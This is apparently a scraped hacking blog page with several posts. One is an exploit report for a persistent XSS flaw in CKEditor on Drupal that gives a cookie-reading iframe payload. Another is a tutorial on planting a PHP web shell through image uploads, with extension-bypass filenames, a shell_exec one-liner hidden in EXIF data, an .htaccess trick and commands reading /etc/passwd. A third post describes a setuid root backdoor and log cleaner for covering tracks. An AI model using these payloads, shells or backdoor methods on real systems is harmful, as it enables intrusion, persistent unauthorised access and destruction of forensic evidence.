<a href="http://i.imgur.com/ZkJPIpK.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/ZkJPIpK.jpg" height="430" width="640" /></a></div>
<br />
This persistent XSS vulnerability requires a little bit social
engineering to work, see the report below:<br />
<br />
<a name='more'></a><br />
<br />
<br />
# Exploit Title: Persistent XSS in wysiwyg module CKEditor <4.1 Drupal 6.x & 7.x<br />
# Date: 15/05/2013<br />
# Exploit Author: r0ng<br />
# Vendor Homepage: http://www.websitesecurityscan.net, http://www.hackers2devnull.blogspot.co.uk<br />
# Software Links: http://ckeditor.com/release/CKEditor-4.0.3, http://drupal.org/download<br />
# Version: CKEditor <4.1, wysiwyg (all versions), Drupal 6.x and 7.x<br />
# Tested on: Firefox 21, IE 10, Chrome (v.26 now blocks it, unsure when this change was implemented)<br />
# Sites affected: approximately 180,000 drupal sites use ckeditor (http://drupal.org/project/usage/ckeditor)<br />
<br />
# Configuration:<br />
# -Default installation of Drupal 6.x and 7.x<br />
# -Default input filters (filtered HTML, disable rich text)<br />
<br />
[+] Vulnerability:<br />
<br />
By posting the following vector into a comment or a content post, a hidden iframe executes unrestricted javascript when viewed in edit mode (document.cookie is accessible). The attack vector is concealed when viewing the post normally and can be exploited by persuading the admin to edit a user's post or by them following a direct link, e.g.: http://website/node/4/edit.<br />
<br />
<br />
[+] Vector - hidden iframe with URL encoded script tags<br />
<br />
<iframe src="data:text/html; charset=utf-8,%3cscript%3ealert(document.cookie);%3c/script%3e" width="1" height="1" frameborder="0"></iframe><br />
<br />
<br />
[+] Disclosure and Fix:<br />
<br />
This was disclosed to Drupal on 20/01/13, and was fixed with the release of ckeditor 4.1 (21/03/13) (Although at time of writing, backports of fix for previous version to ver 8 are still vulnerable...)<br />
<br />
<br />
<br />
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-80813840731263717442013-05-10T05:55:00.001-07:002013-10-23T15:33:24.933-07:00How to shell a server via image upload and bypass extension + real image verification<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTQhM42oilED_7Xm-sAJMohdeL9iY5ExASaiXUp9rJPYQ_cow84KHSEcItzbuhqvizgbdcEPp1VbclPGEHKbZzbYz7PPdOKTkxtTArqaeVKfcbtK2DBmeNEQqlApBnGzA29o7HmF7zH65J/s1600/terminal_icon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTQhM42oilED_7Xm-sAJMohdeL9iY5ExASaiXUp9rJPYQ_cow84KHSEcItzbuhqvizgbdcEPp1VbclPGEHKbZzbYz7PPdOKTkxtTArqaeVKfcbtK2DBmeNEQqlApBnGzA29o7HmF7zH65J/s320/terminal_icon.png" width="320" /></a></div>
During a website audit, upload forms and other interactive 'user-content' driven facilities are often found to be protected by client side and/or server side security checks. This tutorial presents the methods that can be used to circumvent these security checks. In this case we're specifically considering image uploads that allow JPG files in particular.<br />
<br />
<a name='more'></a><br />
<br />
Each security measure numbered below will be briefly discussed and paired with an appropriate bypass method, this tutorial aims to provide a complete'ish solution.<br />
<br />
<h4>
1. Client side file verification (with Javascript and/or HTML attributes)</h4>
<br />
<pre class="default prettyprint prettyprinted"><code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">input name</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"fileToUpload" </span><span style="color: #66ccff;">type</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"file" </span><span style="color: #66ccff;">onchange</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"check_file()" </span></span><span style="color: #7ac07c;"><span style="background-color: black;">> </span></span></code></pre>
<pre class="default prettyprint prettyprinted"><code><span style="color: #7ac07c;"><span style="background-color: black;">if($_FILES['userfile']['type'] != "image/jpg") </span></span></code></pre>
<br />
The bypass is trivial, simply rename your shell with an allowed extension/content type by editing the request header data with an intercepting proxy, I like <a href="http://portswigger.net/burp/" target="_blank">burp</a>, but FF <a href="https://addons.mozilla.org/En-us/firefox/addon/tamper-data/" target="_blank">Tamper Data</a> add-on is great too.<br />
<h4>
2. A white-list of file extensions is in place so that anything that isn't a picture is DENIED:</h4>
<br />
<code><span style="background-color: black;"><span style="color: #66ccff;">$valid_file_extensions </span><span style="color: #7ac07c;">= array(</span><span style="color: #ff99ff;">".jpg"</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">".jpeg"</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">".gif"</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">".png"</span></span><span style="color: #7ac07c;"><span style="background-color: black;">); </span></span></code><br />
<br />
Often there will then be some sort of string manipulation to determine the file name and extension of an uploaded file. The strength of this code will determine whether one of the following bypasses will work. Functions like 'strrchr' shown below may play a part in this process and may be passable given a little bit of imagination!<br />
<br />
<span style="background-color: black;"><code><span style="color: #66ccff;"></span></code></span><br />
<span style="background-color: black;"><code><span style="color: #66ccff;">$file_extension </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">strrchr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$_FILES</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">"file"</span><span style="color: #7ac07c;">][</span><span style="color: #ff99ff;">"name"</span><span style="color: #7ac07c;">], </span><span style="color: #ff99ff;">"."</span><span style="color: #7ac07c;">); </span></code></span><br />
<span style="background-color: black;"><code><span style="color: #7ac07c;"><br /></span></code></span>
<br />
Here is a list of bypasses:<br />
<br />
shell.jpg.php (satisfies as check for jpg only)<br />
shell.jpg.PhP (obfuscation)<br />
shell.php;.jpg (sometimes can ignore whats after ";")<br />
shell.php%0delete0.jpg (the infamous NULL byte which comments out trailing text, remove the word delete so the zeros join together, blogspot strips this string!)<br />
<br />
shell.php.test (defaults to first recognised extension ignoring "test")<br />
shell.php.xxxjpg (still ends in .jpg, but not recognised extension so will default to php!)<br />
.phtml (a commonly used php parsed extension often forgotten about!)<br />
.php3/.php4/.php5 (valid PHP extensions possibly left out of extension blacklists)<br />
<br />
<h4>
<span style="background-color: white;"><code><span style="color: #7ac07c;"></span></code></span>3.Perform further checks once uploaded to make sure it is a REAL image:</h4>
<h4>
<br /><code><span style="background-color: black;"><span style="color: #66ccff;">$imageinfo </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">getimagesize</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$_FILES</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'userfile'</span><span style="color: #7ac07c;">][</span><span style="color: #ff99ff;">'tmp_name'</span></span><span style="color: #7ac07c;"><span style="background-color: black;">]); </span></span></code></h4>
The function getimagesize() effectively confirms whether the uploaded file is an image or not. At this point, all the other methods will fail (there are other functions that can be used with a similar goal such as checking image dimensions). The only full-proof solution is to actually upload a real image which will actually pass these checks rather than trying to bypass them.<br />
<br />
We turn to the trusty JPG file as our example image. There is an amazing amount of information that can be stored in a jpg file along side the actualy image data. EXIF 'meta' data such as the camera model the image was taken on, image descriptions, and comments are editable with progams such as GIMP and even a hex editor. For purposes of this tutorial I use <a href="http://exifpilot.com/" target="_blank">Exif Pilot</a>. (Edit: My good pal Hooded Robin wrote a nifty exif editor and shell builder in Ruby, check it out <a href="http://kaoticcreations.blogspot.co.uk/2013/10/ohno-evil-image-builder-meta-manipulator.html" target="_blank">here</a>).<br />
<br />
Create a small image (avatar size) in MSPaint (white background), we can use Exif Pilot to open/edit the file and edit the Exif data- inserting our PHP code into the 'comment' section. See the pic below, I am using my generic 'tiny shell' code to allow me to pass shell commands to the server on the fly.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Iew2dsa.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="http://i.imgur.com/Iew2dsa.jpg" width="640" /></a></div>
<br />
<b>code: </b><br />
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #66ccff;"><?</span><span style="color: #7ac07c;">if(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'r0ng'</span><span style="color: #7ac07c;">]){echo</span><span style="color: #ff99ff;">"<pre>"</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">shell_exec</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">"r0ng"</span><span style="color: #7ac07c;">]);}</span><span style="color: #66ccff;">?></span></code></span></div>
</div>
<br />
Now we can upload the jpg file using an extension bypass shown earlier, and it will pass the real image check.<br />
<br />
To run commands on the server, usage would be:<br />
<br />
website.com/shell.jpg.php?r0ng=cat /etc/passwd<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/YyHTDmA.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://i.imgur.com/YyHTDmA.jpg" width="636" /></a></div>
<h4>
4.Found an extension that will upload but its not valid php...</h4>
<span style="font-weight: normal;">Upload an .htaccess file which sets an arbitrary file extension to be processed as php. If there is already an .htacess file in the image upload directory this should be automatically overwritten.</span><br />
<span style="font-weight: normal;">Create a .htaccess file and put the following code, then upload it (replace .mp3 with whatever extension passed).</span><br />
<span style="background-color: black;"><br /><code><span style="color: #66ccff;">AddType application</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">x</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">httpd</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">php </span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">mp3 </span></code></span><br />
<span style="font-weight: normal;">Upload your shell as shell.mp3. Then access as: </span>website.com/shell.mp3?r0ng=cat /etc/passwd<br />
<h4>
</h4>
<h4>
(If you find this useful, why not checkout a advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span></h4>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>Unknownnoreply@blogger.com10tag:blogger.com,1999:blog-2511450483904536606.post-7725282648683923622013-01-25T11:47:00.001-08:002013-08-18T05:49:13.312-07:002nd Cross-site-scripting vulnerability find in Microsoft.com<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0WIRK_iQW6dZ9-POsopklU0xIDmNEaSKn4kLH18Pbuz7D7nasuQBtbNRiwpL_p9gkWocM0pM_jprjEmCE0LNfuOXfHtTa408OWrhZvHJo7iVMiY8QytWRptsixglCnpzjmvyvajM_XJk2/s1600/microsoft.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0WIRK_iQW6dZ9-POsopklU0xIDmNEaSKn4kLH18Pbuz7D7nasuQBtbNRiwpL_p9gkWocM0pM_jprjEmCE0LNfuOXfHtTa408OWrhZvHJo7iVMiY8QytWRptsixglCnpzjmvyvajM_XJk2/s1600/microsoft.png" /></a></div>
<br />
Another Microsoft find for the wall! <a href="http://technet.microsoft.com/en-us/security/cc308589.aspx">http://technet.microsoft.com/en-us/security/cc308589.aspx</a><br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-61708986841364209262012-12-14T10:00:00.000-08:002014-12-16T10:42:08.723-08:00<h3 class="post-title entry-title" itemprop="name">
<a href="http://hackers2devnull.blogspot.co.uk/2012/12/blog-post_14.html">C Source Release:</a></h3>
<h2>
</h2>
<h2>
<span style="font-family: Georgia,"Times New Roman",serif; font-size: x-large;">LastDoor</span> -<span style="font-family: Georgia,"Times New Roman",serif;"> Root Backdoor and Log-Cleaner for Linux</span></h2>
<h2>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTU7yrOExBRm2DNjKBeyzRiXpBHBmWDVwUQIlje18PMyS5Pq7ZKPOH7csNtmZItA7fmzepYkxkEF1wcT2RVKbMHl7ILs9oixRTgDf3ngnDdTe8RdEvG_cCOSSArsLDfDJllDxcq-ENAMyy/s1600/functions1x.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTU7yrOExBRm2DNjKBeyzRiXpBHBmWDVwUQIlje18PMyS5Pq7ZKPOH7csNtmZItA7fmzepYkxkEF1wcT2RVKbMHl7ILs9oixRTgDf3ngnDdTe8RdEvG_cCOSSArsLDfDJllDxcq-ENAMyy/s1600/functions1x.jpg" /></a></h2>
<h4>
[<span style="color: red;">+</span>] What is it?</h4>
<h4>
</h4>
<h3>
A backdoor for retaining root access and a log cleaner with several functions.</h3>
<h4>
<a name='more'></a></h4>
<h4>
<span style="color: red;"> </span></h4>
<h4>
<span style="color: red;">Important!</span>: LastDoor was created as a demonstration tool for use in legal penetrations testing. By using this program you accept full responsibility. The creator accepts no liability for any damage or harm that may be caused with its use.</h4>
<h4>
</h4>
<h4>
<br /> [<span style="color: red;">+</span>] Features?</h4>
<h4>
</h4>
<h4>
</h4>
<h4>
</h4>
<h4>
</h4>
<span style="font-weight: normal;">- Hardcoded password, no prompt/blank screen unless correct password entered</span><br />
<br />
<span style="font-weight: normal;">
- Protection for virtual file systems</span><br />
<br />
<span style="font-weight: normal;">
- All commands sent to system as root once setuid 0.</span><br />
<br />
<span style="font-weight: normal;">
- Log cleaner searches the file system for chosen strings, no finite log lists used</span><br />
<br />
<span style="font-weight: normal;">
- Log cleaner options:</span><br />
<span style="font-weight: normal;">
- Search string replace with new string (e.g. change your ip in the logs)</span><br />
<br />
<span style="font-weight: normal;">
- Search string delete string</span><br />
<br />
<span style="font-weight: normal;">
- Search string delete line</span><br />
<br />
<span style="font-weight: normal;">
- Search string delete file contents</span><br />
<br />
<span style="font-weight: normal;">
- Multi-string search/destroy at once</span><br />
<br />
<span style="font-weight: normal;">
- Includes hidden files</span><br />
<br />
<span style="font-weight: normal;">
- Maintains the file modified date despite making changes</span><br />
<br />
<span style="font-weight: normal;">
- On running the log cleaner, the process is forked as a background daemon</span><br />
<br />
<span style="font-weight: normal;">
- User sets timer prior to running so they can logout/exit, and it will clean up after you have gone.</span><br />
<br />
<span style="font-weight: normal;">
- If you don't logout prior to the process starting, the file search process will be displayed</span><br />
<br />
<span style="font-weight: normal;">
- If you do logout prior to the process starting this will allow your .bash_history to refresh</span><br />
<span style="font-weight: normal;">
and be included in the search (shoud you want to delete your ./LastDoor command for example). </span><br />
<h4>
<span style="font-weight: normal;"><br /></span></h4>
<h4>
[<span style="color: red;">+</span>] Compatibility issues? </h4>
<h4>
</h4>
<span style="font-weight: normal;">- The program utilizes Find Grep and Sed. The syntax used was tested in a GNU coreutils environment and will fail for BSD (for example). This will be fixed in the next version after further testing is done.</span><br />
<h4>
</h4>
<h4>
[<span style="color: red;">+</span>] Compile/use? </h4>
<h4>
</h4>
<h4>
<span style="font-weight: normal;"></span></h4>
<h4>
<span style="font-weight: normal;"></span></h4>
<span style="font-weight: normal;">- gcc LastDoor.c -o LastDoor -Wall (all std libs used)</span><br />
<br />
<span style="font-weight: normal;">
- cp LastDoor /bin/LastDoor (for example)</span><br />
<br />
<span style="font-weight: normal;">
- chmod u+s /bin/LastDoor (set the s bit)</span><br />
<span style="font-weight: normal;"><br />- non-rootuser@whatever# /bin/LastDoor (run!)</span><br />
<h4>
<span style="font-weight: normal;"> </span></h4>
<h2>
</h2>
<h2>
</h2>
<h3>
<b><i>Example scenario: </i></b></h3>
<span style="color: #cc0000;"><span style="font-size: small;">"</span><span style="font-size: x-small;"><span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">We have manage<span style="font-size: small;">d to escalate to root via a local explo<span style="font-size: small;">it on the server and now want to put in place a means <span style="font-size: small;">of</span> getting back to root in the future whil<span style="font-size: small;">st covering ou<span style="font-size: small;">r tracks..</span></span></span></span></span></span></span></span>:<br />
<br />
<span style="color: blue;"><br /></span>
<span style="color: blue;">Step 1</span>: Compile the program and chmod the user s bit permission:<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPzmB4V7614bSykQTlgUH3gbxY8wDbGbLQVsDrGtddpsIPM0s3F5DxnnDMUZLWh40hNeW2plMVGZX6MfaN2uW8wUTxYRVyaruewTA2Vr96MAjfySiv5gyy_Ce3BFVsLlvHTKc23eBFAQ0t/s1600/compile2x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPzmB4V7614bSykQTlgUH3gbxY8wDbGbLQVsDrGtddpsIPM0s3F5DxnnDMUZLWh40hNeW2plMVGZX6MfaN2uW8wUTxYRVyaruewTA2Vr96MAjfySiv5gyy_Ce3BFVsLlvHTKc23eBFAQ0t/s1600/compile2x.jpg" /></a></div>
<br />
Note that the permissions are now: -rw<u><b>s</b></u>r-xr-x<b> </b>for LastDoor<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYUowIZG5J6hK1dYjxPSOePpGYdl_zdh4WzkUrVQ4fzEVku-6Ek_ebzPeL1bxRB0VqH50oYwbm5AgNRwBz9xODIpoRJQJTiQlnQOHyLBun3WsHganyQEU03BbFbZmn3smk6tHv46l5TTwf/s1600/compile3x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYUowIZG5J6hK1dYjxPSOePpGYdl_zdh4WzkUrVQ4fzEVku-6Ek_ebzPeL1bxRB0VqH50oYwbm5AgNRwBz9xODIpoRJQJTiQlnQOHyLBun3WsHganyQEU03BbFbZmn3smk6tHv46l5TTwf/s1600/compile3x.jpg" /></a></div>
<br />
<span style="color: blue;">Step 2</span>: Run program and login (note that there is no password prompt, and no feedback is given unless password is correct):<br />
<br />
Note, I switched to a non-root user for demonstration purposes:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiCLNNHR5R6uxx1oLmt3k6lTFMfS27h2ie_ef9sDNW9EVMFmA5xHH1vfrK496wYGbbRp3RWv4MJiIpFey28Q2k9K3MfRATlygarO-YYUeV2OekMjskEssoqjuMlPhja-hcH30V-SVc_UTa/s1600/id1x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiCLNNHR5R6uxx1oLmt3k6lTFMfS27h2ie_ef9sDNW9EVMFmA5xHH1vfrK496wYGbbRp3RWv4MJiIpFey28Q2k9K3MfRATlygarO-YYUeV2OekMjskEssoqjuMlPhja-hcH30V-SVc_UTa/s1600/id1x.jpg" /></a></div>
<br />
Run program and enter password (r0ng) <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGN3peDadxys28aNoKRmgwEXHexY1trr9ijt6GIpvDa8RchsQt2K0GslGKgGXpEEkGqsTzo2hyhyphenhyphenPLaFC3_tBi75HTULDR5mEy06-q9wh3inunvTStX9HuxG2u8vfGudsREb_m68Rj6gbZ/s1600/passx.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGN3peDadxys28aNoKRmgwEXHexY1trr9ijt6GIpvDa8RchsQt2K0GslGKgGXpEEkGqsTzo2hyhyphenhyphenPLaFC3_tBi75HTULDR5mEy06-q9wh3inunvTStX9HuxG2u8vfGudsREb_m68Rj6gbZ/s1600/passx.jpg" /></a></div>
<br />
First signs of life!: <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTU7yrOExBRm2DNjKBeyzRiXpBHBmWDVwUQIlje18PMyS5Pq7ZKPOH7csNtmZItA7fmzepYkxkEF1wcT2RVKbMHl7ILs9oixRTgDf3ngnDdTe8RdEvG_cCOSSArsLDfDJllDxcq-ENAMyy/s1600/functions1x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTU7yrOExBRm2DNjKBeyzRiXpBHBmWDVwUQIlje18PMyS5Pq7ZKPOH7csNtmZItA7fmzepYkxkEF1wcT2RVKbMHl7ILs9oixRTgDf3ngnDdTe8RdEvG_cCOSSArsLDfDJllDxcq-ENAMyy/s1600/functions1x.jpg" /></a></div>
<br />
<span style="color: blue;">Step 3</span>: Verify that we are root: Select option 1 and check 'id' & 'whoami':<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgVQ_UGDydsLXWWBW7IMCss1Enc5hTjLX81TbHCfrdgSOJ4zSj9XA8h1wnN35ZXfVgeETwDYhOjtivkCwCXD-9P74swdSmAfzq4BvnBQocCoTEUUpBoObkrFKzFYhKDo48N0H6D1k9Ng_Z/s1600/functions2x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgVQ_UGDydsLXWWBW7IMCss1Enc5hTjLX81TbHCfrdgSOJ4zSj9XA8h1wnN35ZXfVgeETwDYhOjtivkCwCXD-9P74swdSmAfzq4BvnBQocCoTEUUpBoObkrFKzFYhKDo48N0H6D1k9Ng_Z/s1600/functions2x.jpg" /></a></div>
<br />
<span style="color: blue;">Step 4</span>: Now that the backdoor is in place, time to cover tracks with the log cleaner. Notice in the picture below I have chosen the syslog for demonstration purposes. Highlighted for future reference is the last date modified "2012-12-13 23:54"<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAa4EyWrQzJbWyCoLcFnWaqOxpWrNKB0U26FCv-Z0XpTLuVMljjX1fpoxsAFUTUt9ipu2MB5qyx0WjTzOchyhwe5ottIST9_Az-YYpN8pOeAw78L2uGVPDDDhW4OOadCDEdVs6E9QW_J0U/s1600/varlog1x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAa4EyWrQzJbWyCoLcFnWaqOxpWrNKB0U26FCv-Z0XpTLuVMljjX1fpoxsAFUTUt9ipu2MB5qyx0WjTzOchyhwe5ottIST9_Az-YYpN8pOeAw78L2uGVPDDDhW4OOadCDEdVs6E9QW_J0U/s1600/varlog1x.jpg" /></a></div>
<br />
Prior to running the log cleaner, I modified two ips in the syslog to illustrate its functions. The two lines highlighted are ip: 987.654.321.987, and on the next line 123.456.789.123. We will aim to delete the line where the first ip is found, and change the second ip from 123.456.789.123 to 111.111.111.111.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnBlKaQFrdOoVLV3DCAUKfQteqcH4M9ComShkIrltf4lJ7V_is4iJ4P-5Iry87kWRjE0oWzOyt-vOOgm2kdD0kyfT7KddoOzKBxark0Hj7Tpe4aNh345uGjft_ApuIMEKiOu9f9KkIpOvH/s1600/varlog2x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnBlKaQFrdOoVLV3DCAUKfQteqcH4M9ComShkIrltf4lJ7V_is4iJ4P-5Iry87kWRjE0oWzOyt-vOOgm2kdD0kyfT7KddoOzKBxark0Hj7Tpe4aNh345uGjft_ApuIMEKiOu9f9KkIpOvH/s1600/varlog2x.jpg" /></a></div>
<br />
<span style="color: blue;">Step 5</span>: Bring up the Log Cleaner options:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFdRm7OorCyTlv8xd4MtEcr2X1KM_EW2r2UvAHuHbPj0Z10a8ZTJdI-YQPyNyN5ga2LZnfCZGn9q1ghub_SakMSzUu3NoGkIHDJWKSB3ZABSNFZrjee39bR2uq42B154LniRak2oaOUKFu/s1600/functions3x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFdRm7OorCyTlv8xd4MtEcr2X1KM_EW2r2UvAHuHbPj0Z10a8ZTJdI-YQPyNyN5ga2LZnfCZGn9q1ghub_SakMSzUu3NoGkIHDJWKSB3ZABSNFZrjee39bR2uq42B154LniRak2oaOUKFu/s1600/functions3x.jpg" /></a></div>
<br />
We want to replace the ip 123.456.789.123 with 111.111.111.111, so select option 1 (search/replace string), enter in the ip address to search for, enter the replacement ip, then enter the max directory depth (e.g. /var/log/... would require 3):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWRKRQElD0NDmLkQB3cE3Ku8bKpINPUqDidhHSrwavYgOik2TVi7r0M72Q5UTUDQJK96l9qDpvBWcMKIz0xXvA5Ltb00Bfg07nVAYLPuVlT_woojv_TD27fQzQLVjWIrvvLwVloNVKFKM0/s1600/functions4x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWRKRQElD0NDmLkQB3cE3Ku8bKpINPUqDidhHSrwavYgOik2TVi7r0M72Q5UTUDQJK96l9qDpvBWcMKIz0xXvA5Ltb00Bfg07nVAYLPuVlT_woojv_TD27fQzQLVjWIrvvLwVloNVKFKM0/s1600/functions4x.jpg" /></a></div>
<br />
After that, we are asked if we want to do more search/replace jobs. Since we want to delete the line where the ip 987.654.321.987 is present, we choose yes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
